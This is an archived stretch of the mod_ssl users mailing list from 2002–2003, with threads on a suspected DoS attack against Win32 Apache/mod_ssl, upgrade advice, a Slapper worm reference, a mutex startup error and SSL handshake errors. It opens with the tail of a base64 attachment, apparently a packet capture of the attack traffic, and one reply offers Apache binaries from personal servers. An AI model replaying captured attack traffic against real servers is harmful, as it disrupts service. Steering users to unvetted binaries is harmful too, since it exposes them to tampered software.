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
AADnfQAA
--------------64192C76DD9A01B614C0BD74--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu Dec 19 17:29:43 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id BEC4F2AA086; Thu, 19 Dec 2002 17:29:43 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from sccrmhc03.attbi.com (sccrmhc03.attbi.com [204.127.202.63])
	by master.modssl.org (Postfix) with ESMTP id 39B432AA078
	for ; Thu, 19 Dec 2002 17:29:42 +0100 (CET)
Received: from hm2k (12-240-105-132.client.attbi.com[12.240.105.132])
          by sccrmhc03.attbi.com (sccrmhc03) with SMTP
          id <2002121916293900300lqr7je>; Thu, 19 Dec 2002 16:29:40 +0000
From: "HMajidy" 
To: 
Subject: RE: DoS attack on mod_ssl 2.8.12 ??
Date: Thu, 19 Dec 2002 08:24:06 -0800
Message-ID: 
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2911.0)
In-Reply-To: <3E01EDE0.F353F311@01com.com>
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Importance: Normal
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "HMajidy" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I have heard from several sources Apache version 1.x for Windows does not
thread very well. The first real Win32 version is Apache 2.0. This does not
answer your question, I know, but it's something to consider in formulating
a long-term solution.

-----Original Message-----
From: owner-modssl-users@modssl.org [mailto:owner-modssl-users@modssl.org]On
Behalf Of Sergey Strakhov
Sent: Thursday, December 19, 2002 8:04 AM
To: modssl-users@modssl.org
Cc: Pedro Nascimento; Greg Davydouski
Subject: DoS attack on mod_ssl 2.8.12 ??


Hello,

We are experiencing problems with our Win32 Apache 1.3.27 with mod_ssl
2.8.12 + openssl 0.9.6g running on Windows 2000.
It is a sort of DoS attack that makes our web site totally inaccessible.

One of those attacks was captured with Ethereal. The dump is attached.

As you can see, the attack is accomplished through both HTTP (80) and
HTTPS (443) ports.
First, the connection is opened to the HTTP port and a malformed
HTTP/1.1 GET request (with no Host: header) is sent to the HTTP port
(probably with an intention to produce a crash described in
http://www.cert.org/advisories/CA-2002-27.html or just to determine the
host's Server version). The server responds with "HTTP/1.1 400 Bad
request" and closes the connection. After that the attacker starts
opening connections to the HTTPS port. One of them is used to send SSLv2
Client Hello request. From this point the web server starts rejecting
all incoming connections and the web site stops responding on both HTTP
and HTTPS ports.

The error log usually contains records like:

[..time..] [error] [client ..] client sent HTTP/1.1 request without
hostname (see RFC2616 section 14.23): /
[..time..] [error] Server ran out of threads to serve requests. Consider
raising the ThreadsPerChild setting

Is this problem related to mod_ssl anyhow?
Do you expect any fix for this problem soon?

Regards

P.S. We have the ThreadsPerChild parameter of httpd.conf set to 10.



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 20 05:34:42 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 1DE892AA081; Fri, 20 Dec 2002 05:34:42 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from tomts23-srv.bellnexxia.net (tomts23-srv.bellnexxia.net [209.226.175.185])
	by master.modssl.org (Postfix) with ESMTP id 02F372AA05C
	for ; Fri, 20 Dec 2002 05:34:39 +0100 (CET)
Received: from localhost.localdomain ([64.231.120.98])
          by tomts23-srv.bellnexxia.net
          (InterMail vM.5.01.04.19 201-253-122-122-119-20020516) with ESMTP
          id <20021220043437.RYWE22723.tomts23-srv.bellnexxia.net@localhost.localdomain>;
          Thu, 19 Dec 2002 23:34:37 -0500
Subject: Re: DoS attack on mod_ssl 2.8.12 ??
From: hunter 
To: modssl-users@modssl.org
Cc: Pedro Nascimento ,
	Greg Davydouski 
In-Reply-To: <3E01EDE0.F353F311@01com.com>
References: <3E01EDE0.F353F311@01com.com>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.5 
Date: 19 Dec 2002 23:34:38 -0500
Message-Id: <1040358878.375.23.camel@ptak>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: hunter 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Thu, 2002-12-19 at 11:03, Sergey Strakhov wrote:
> Hello,
> 
> We are experiencing problems with our Win32 Apache 1.3.27 with mod_ssl
> 2.8.12 + openssl 0.9.6g running on Windows 2000.
> It is a sort of DoS attack that makes our web site totally inaccessible.
> 
> One of those attacks was captured with Ethereal. The dump is attached.
> 
> As you can see, the attack is accomplished through both HTTP (80) and
> HTTPS (443) ports.
> First, the connection is opened to the HTTP port and a malformed
> HTTP/1.1 GET request (with no Host: header) is sent to the HTTP port
> (probably with an intention to produce a crash described in
> http://www.cert.org/advisories/CA-2002-27.html or just to determine the
> host's Server version). The server responds with "HTTP/1.1 400 Bad
> request" and closes the connection. After that the attacker starts
> opening connections to the HTTPS port. One of them is used to send SSLv2
> Client Hello request. From this point the web server starts rejecting
> all incoming connections and the web site stops responding on both HTTP
> and HTTPS ports.
> 
> The error log usually contains records like:
> 
> [..time..] [error] [client ..] client sent HTTP/1.1 request without
> hostname (see RFC2616 section 14.23): /
> [..time..] [error] Server ran out of threads to serve requests. Consider
> raising the ThreadsPerChild setting
> 
> Is this problem related to mod_ssl anyhow?
> Do you expect any fix for this problem soon?
> 
> Regards
> 
> P.S. We have the ThreadsPerChild parameter of httpd.conf set to 10.
> 

Your code is very much out of date ... it is exploitable and DOSable

I saw many people in the summer describe similar reports as yours,
prompting me to build Apache binaries for many of those that were
suffering.

You cannot continue to run with openssl 0.9.6g -- openssl 0.9.6h is the
current version.  My advice is do not waste your time trying to
understand it.

You can get reliable up-to-date binaries from me ;)  Other people are
downloading the binaries as well.

http://hunter.campbus.com/
Apache_1.3.27-Mod_SSL_2.8.11-OpenSSL_0.9.6h-Win32.zip

http://hunter.campbus.com/Openssl-0.9.6h-Win32.zip

http://hunter.campbus.com/Apache_2.0.43-OpenSSL_0.9.6h-Win32.zip

You can also get them from my server ... md5's are avaialble from my
server as well. 

http://tor.ath.cx/~hunter/
Apache_1.3.27-Mod_SSL_2.8.11-OpenSSL_0.9.6h-Win32.zip

http://tor.ath.cx/~hunter/Openssl-0.9.6h-Win32.zip

http://tor.ath.cx/~hunter/Apache_2.0.43-OpenSSL_0.9.6h-Win32.zip

You are welcome to contac me directly 
h u n t e r @ t o r . a t h . c x

If you need instructions on how to rebuild the code, I have to look for
them - they are messy (for Apache2) and can be found in the archives -
search for 'apache hunter masm' -- apache 1.3.27 is easy to build let me
know if you need help.

hunter


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Dec 20 09:32:17 2002
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D8A0D2AA081; Fri, 20 Dec 2002 09:32:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from ns0a.swx.com (ns0a.swx.com [146.109.240.107])
	by master.modssl.org (Postfix) with ESMTP id 5AF5A2AA05C
	for ; Fri, 20 Dec 2002 09:32:16 +0100 (CET)
Received: from gate0a.unix.swx.ch (gate0a [192.168.252.17])
	by ns0a.swx.com (8.12.6/8.12.6) with ESMTP id gBK8WDsb005387
	for ; Fri, 20 Dec 2002 09:32:13 +0100 (MET)
Received: from SOMEXEVS001.ex.ordersx.org (localhost [127.0.0.1])
	by gate0a.unix.swx.ch (8.12.6/8.12.6) with ESMTP id gBK8W7Do023895
	for ; Fri, 20 Dec 2002 09:32:11 +0100 (MET)
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="koi8-r"
Content-Transfer-Encoding: 7bit
X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4910.0300
Subject: RE: DoS attack on mod_ssl 2.8.12 ??
Date: Fri, 20 Dec 2002 09:31:33 +0100
Message-ID: <484A6CA492BE654395D208B1D8D5393973A643@SOMEXEVS001.ex.ordersx.org>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: DoS attack on mod_ssl 2.8.12 ??
Importance: normal
Thread-Index: AcKnhvGrcoU6hdTQT0OZGaq37G6hLQAethXw
From: "Boyle Owen" 
To: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Boyle Owen" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

There is a major thread running on the openssl list about this very
thing (Slapper worm)... Starts here:

http://www.mail-archive.com/openssl-users@openssl.org/msg29762.html

Rgds,

Owen Boyle

>-----Original Message-----
>From: Sergey Strakhov [mailto:strakhov@01com.com]
>Sent: Donnerstag, 19. Dezember 2002 17:04
>To: modssl-users@modssl.org
>Cc: Pedro Nascimento; Greg Davydouski
>Subject: DoS attack on mod_ssl 2.8.12 ??
>
>
>Hello,
>
>We are experiencing problems with our Win32 Apache 1.3.27 with mod_ssl
>2.8.12 + openssl 0.9.6g running on Windows 2000.
>It is a sort of DoS attack that makes our web site totally 
>inaccessible.
>
>One of those attacks was captured with Ethereal. The dump is attached.
>
>As you can see, the attack is accomplished through both HTTP (80) and
>HTTPS (443) ports.
>First, the connection is opened to the HTTP port and a malformed
>HTTP/1.1 GET request (with no Host: header) is sent to the HTTP port
>(probably with an intention to produce a crash described in
>http://www.cert.org/advisories/CA-2002-27.html or just to determine the
>host's Server version). The server responds with "HTTP/1.1 400 Bad
>request" and closes the connection. After that the attacker starts
>opening connections to the HTTPS port. One of them is used to 
>send SSLv2
>Client Hello request. From this point the web server starts rejecting
>all incoming connections and the web site stops responding on both HTTP
>and HTTPS ports.
>
>The error log usually contains records like:
>
>[..time..] [error] [client ..] client sent HTTP/1.1 request without
>hostname (see RFC2616 section 14.23): /
>[..time..] [error] Server ran out of threads to serve 
>requests. Consider
>raising the ThreadsPerChild setting
>
>Is this problem related to mod_ssl anyhow?
>Do you expect any fix for this problem soon?
>
>Regards
>
>P.S. We have the ThreadsPerChild parameter of httpd.conf set to 10.
>
>

This message is for the named person's use only. It may contain
confidential, proprietary or legally privileged information. No
confidentiality or privilege is waived or lost by any mistransmission.
If you receive this message in error, please notify the sender urgently
and then immediately delete the message and any copies of it from your
system. Please also immediately destroy any hardcopies of the message.
You must not, directly or indirectly, use, disclose, distribute, print,
or copy any part of this message if you are not the intended recipient.
The sender's company reserves the right to monitor all e-mail
communications through their networks. Any views expressed in this
message are those of the individual sender, except where the message
states otherwise and the sender is authorised to state them to be the
views of the sender's company. 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Jan  3 19:25:30 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 719352AA0A0; Fri,  3 Jan 2003 19:25:30 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from capa.visilinx.com (webmail.visilinx.com [66.226.194.12])
	by master.modssl.org (Postfix) with ESMTP id CA39C2AA084
	for ; Fri,  3 Jan 2003 19:25:28 +0100 (CET)
Received: from localhost (openmail@localhost)
	by capa.visilinx.com (8.11.6/8.11.6) with ESMTP id h03IIht18340
	for ; Fri, 3 Jan 2003 12:18:44 -0600
X-OpenMail-Hops: 1
Date: Fri, 3 Jan 2003 12:18:43 -0600
Message-Id: 
Subject: httpd won't start
MIME-Version: 1.0
From: jgu@visilinx.com (Jenny Gu)
To: modssl-users@modssl.org
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
	;Creation-Date="Fri, 3 Jan 2003 12:18:43 -0600"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jgu@visilinx.com (Jenny Gu)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

I can't start httpd on linux kernel 2.4.20 which I compiled. The error 
message is:
	[Fri Jan 03 11:11:18 2003] 
	[error] (38)Function not implemented: 
	Cannot create SSLMutex file `/var/log/httpd/ssl_mutex.575'
	Configuration Failed

I have checked all file and directory privileges. It seems no problems. 
I guess that I am missing build components while building the linux 
kernel. Has someone gone through this and tell me which components I am 
missing or have a suggestion?

FYI, httpd starts fine under Red Hat 8.0 with kernel 2.4.18

Thank you,

Jenny Gu


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  6 10:17:16 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6095C2AA0B6; Mon,  6 Jan 2003 10:17:16 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from maggotts.rnib.org.uk (maggotts.rnib.org.uk [194.128.16.48])
	by master.modssl.org (Postfix) with ESMTP id CA4B22AA09E
	for ; Mon,  6 Jan 2003 10:17:14 +0100 (CET)
Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.17])
	by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id h069Ji631545
	for ; Mon, 6 Jan 2003 09:20:05 GMT
Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21)
	id ; Mon, 6 Jan 2003 09:16:32 -0000
Message-ID: <9B66BBD37D5DD411B8CE00508B69700F033F251D@pborolocal.rnib.org.uk>
From: John.Airey@rnib.org.uk
To: modssl-users@modssl.org
Subject: RE: httpd won't start
Date: Mon, 6 Jan 2003 09:16:31 -0000 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2650.21)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: John.Airey@rnib.org.uk
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I doubt that missing something in the build of the kernel would prevent a
file from being created. Some more information would be useful.

When you say linux, do you mean Red Hat? How exactly are you attempting to
start it? What user and group are you starting the server as?

A copy of your httpd.conf configuration file (with any data you don't want
made public removed) would be most useful.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk 

"I know it sounds cocky, but I honestly believe that one day there'll be a
telephone in every Town in America" - Alexander Graham Bell (my paraphrase)


> -----Original Message-----
> From: jgu@visilinx.com [mailto:jgu@visilinx.com]
> Sent: 03 January 2003 18:19
> To: modssl-users@modssl.org
> Subject: httpd won't start
> 
> 
> Hi all,
> 
> I can't start httpd on linux kernel 2.4.20 which I compiled. 
> The error 
> message is:
> 	[Fri Jan 03 11:11:18 2003] 
> 	[error] (38)Function not implemented: 
> 	Cannot create SSLMutex file `/var/log/httpd/ssl_mutex.575'
> 	Configuration Failed
> 
> I have checked all file and directory privileges. It seems no 
> problems. 
> I guess that I am missing build components while building the linux 
> kernel. Has someone gone through this and tell me which 
> components I am 
> missing or have a suggestion?
> 
> FYI, httpd starts fine under Red Hat 8.0 with kernel 2.4.18
> 
> Thank you,
> 
> Jenny Gu
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  6 16:30:12 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id B6C6E2AA0B8; Mon,  6 Jan 2003 16:30:12 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from wlv.to.gd-es.com (WLV.TO.GD-ES.COM [199.107.242.11])
	by master.modssl.org (Postfix) with ESMTP id 4E6C12AA09E
	for ; Mon,  6 Jan 2003 16:28:49 +0100 (CET)
Received: from HDIS-C3620-A50.TO.GD-ES.COM (mcc@HDIS-C3620-A50.TO.GD-ES.COM [199.107.247.50])
	by wlv.to.gd-es.com (8.11.6/8.10.1) with ESMTP id h06FLkV06374
	for ; Mon, 6 Jan 2003 07:21:51 -0800 (PST)
Date: Mon, 6 Jan 2003 07:21:44 -0800 (PST)
From: Merton Campbell Crockett 
X-Sender: mcc@SPIELZEUG.MCC-3.CATO.GD-AIS.COM
To: mod_SSL Users List 
Subject: Apache/mod_ssl and Netscape 4.79
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Merton Campbell Crockett 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

After enabling mod_ssl, I have found that Netscape 4.79 will, occassionally,
"hang" when accessing content on an HTTPS web site.  This seems to occur
when accessing documents generated using server-side includes that contain
references to cascading style sheets, logos, etc. maintained on a common
system.

Is this a known issue with older versions of Netscape?

Merton Campbell Crockett

-- 
BEGIN:				vcard
VERSION:			3.0
FN:				Merton Campbell Crockett
ORG:				General Dynamics Advanced Information Systems;
				Intelligence Solutions
N:				Crockett;Merton;Campbell
EMAIL;TYPE=internet:		mcc@CATO.GD-AIS.COM
TEL;TYPE=work,voice,msg,pref:	+1(805)497-5045
TEL;TYPE=pager,msg:		+1(877)528-0049
TEL;TYPE=fax,work:		+1(805)497-5050
TEL;TYPE=cell,voice,msg:	+1(805)377-6762
END:				vcard

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  6 19:16:49 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 39F7A2AA0B8; Mon,  6 Jan 2003 19:16:49 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from gw.broward.edu (gw.broward.edu [169.139.60.44])
	by master.modssl.org (Postfix) with ESMTP id 9AC082AA0B7
	for ; Mon,  6 Jan 2003 19:15:26 +0100 (CET)
Received: from Primary-MTA by gw.broward.edu
	with Novell_GroupWise; Mon, 06 Jan 2003 13:15:24 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Mon, 06 Jan 2003 13:15:07 -0500
From: "Raj Mettai" 
To: 
Subject: Spurious SSL handshake interrupt
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=_247B0EAC.DEBFC2AE"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Raj Mettai" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--=_247B0EAC.DEBFC2AE
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

Hi All,

I am running apache 2.0.39 with mod_ssl module on solaris 8. connected
to tomcat 4.1.12. I am getting lot of " Spurious SSL handshake
interrupt" errors in ssl_error.log file. All my https calls have become
drastically slow. Any clues on this error please, it's a production
website... 

[Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt
[Hint: Usually just one of those OpenSSL confusions!?]
[Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt
[Hint: Usually just one of those OpenSSL confusions!?]
[Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt
[Hint: Usually just one of those OpenSSL confusions!?]
[Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt
[Hint: Usually just one of those OpenSSL confusions!?]
[Mon Jan 06 13:09:37 2003] [error] Spurious SSL handshake interrupt
[Hint: Usually just one of those OpenSSL confusions!?]

also few other like these....

[Mon Jan 06 13:10:17 2003] [error] SSL handshake failed (server
new.host.name:443, client 12.94.6.64)
[Mon Jan 06 13:10:17 2003] [error] SSL Library Error: 336151574
error:14094416:lib(20):func(148):reason(1046)

any ideas ?????????/

thanks
-Raj

--=_247B0EAC.DEBFC2AE
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit







Hi All,


 


I am running apache 2.0.39 with mod_ssl module on solaris 8. connected to 
tomcat 4.1.12. I am getting lot of " Spurious SSL handshake interrupt" 
errors in ssl_error.log file. All my https calls have become drastically 
slow. Any clues on this error please, it's a production website... 


 


[Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt [Hint: 
Usually just one of those OpenSSL confusions!?]
[Mon Jan 06 13:09:36 2003] 
[error] Spurious SSL handshake interrupt [Hint: Usually just one of those 
OpenSSL confusions!?]
[Mon Jan 06 13:09:36 2003] [error] Spurious SSL 
handshake interrupt [Hint: Usually just one of those OpenSSL 
confusions!?]
[Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake 
interrupt [Hint: Usually just one of those OpenSSL confusions!?]
[Mon Jan 06 
13:09:37 2003] [error] Spurious SSL handshake interrupt [Hint: Usually just one 
of those OpenSSL confusions!?]


also few other like these....


 


[Mon Jan 06 13:10:17 2003] [error] SSL handshake failed (server 
new.host.name:443, client 12.94.6.64)
[Mon Jan 06 13:10:17 2003] [error] SSL 
Library Error: 336151574 error:14094416:lib(20):func(148):reason(1046)


any ideas ?????????/


 


thanks


-Raj


--=_247B0EAC.DEBFC2AE--
______________________________________________________________________
